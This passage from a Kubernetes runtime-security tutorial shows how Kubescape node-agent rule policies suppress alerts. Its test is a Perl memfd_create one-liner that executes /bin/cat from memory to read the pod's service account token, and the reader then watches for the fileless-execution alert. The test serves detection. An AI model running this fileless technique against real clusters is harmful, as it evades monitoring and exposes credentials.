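How the two policy forms interact with supportPolicy can be sketched as a small decision function. This is an illustrative model, not node-agent code: the RulePolicy struct only mirrors the two YAML fields above, suppressed is a hypothetical helper, and matching processAllowed against the process comm ("3" in the alert, the basename of /proc/self/fd/3) is an assumption.

```go
package main

import "fmt"

// RulePolicy mirrors the two rulePolicies fields shown in the YAML above.
type RulePolicy struct {
	ProcessAllowed   []string
	ContainerAllowed bool
}

// suppressed reports whether an alert for ruleID should be dropped.
// Assumption: processAllowed entries are compared with the process comm.
func suppressed(policies map[string]RulePolicy, supportPolicy bool, ruleID, comm string) bool {
	if !supportPolicy {
		return false // the rule ignores policies entirely
	}
	pol, ok := policies[ruleID]
	if !ok {
		return false // no policy for this rule in the profile
	}
	if pol.ContainerAllowed {
		return true // the whole container is allowlisted for this rule
	}
	for _, allowed := range pol.ProcessAllowed {
		if allowed == comm {
			return true
		}
	}
	return false
}

func main() {
	byProcess := map[string]RulePolicy{"R1005": {ProcessAllowed: []string{"3"}}}
	byContainer := map[string]RulePolicy{"R1005": {ContainerAllowed: true}}

	fmt.Println(suppressed(byProcess, true, "R1005", "3"))     // true
	fmt.Println(suppressed(byProcess, false, "R1005", "3"))    // false
	fmt.Println(suppressed(byProcess, true, "R1005", "cat"))   // false
	fmt.Println(suppressed(byContainer, true, "R1005", "cat")) // true
}
```

The second call shows why step B matters: with supportPolicy left at false, the stanza in the profile has no effect.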

D) Make it active:

kubectl rollout restart deployment redis -n redis

Then repeat our fileless exec test:

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \

-o jsonpath='{.items[0].metadata.name}')

kubectl -n redis exec "$REDIS_POD" -- perl -e '

use strict; use warnings;

my $name = "pwned";

my $fd = syscall(279, $name, 0);

if ($fd < 0) { $fd = syscall(319, $name, 0); }

die "memfd_create failed\n" if $fd < 0;

open(my $src, "<:raw", "/bin/cat") or die;

open(my $dst, ">&=", $fd) or die;

binmode $dst; my $buf;

while (read($src, $buf, 8192)) { print $dst $buf; }

close $src;

exec {"/proc/self/fd/$fd"} "cat",

"/var/run/secrets/kubernetes.io/serviceaccount/token";

'

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=500 | jq '.message'

Toggle the label on and off and repeat the attack; watch the message "Fileless execution detected: exec call "3" is from a malicious source" appear and disappear.

Because this profile is completely empty, you'll also see alerts for everything else the container does. You can use this like strace for debugging.

Side Quest: Inspect the ApplicationProfile

PROFILE=$(kubectl -n redis get applicationprofile -o jsonpath='{.items[0].metadata.name}')

kubectl -n redis get applicationprofile "$PROFILE" -o yaml | head -80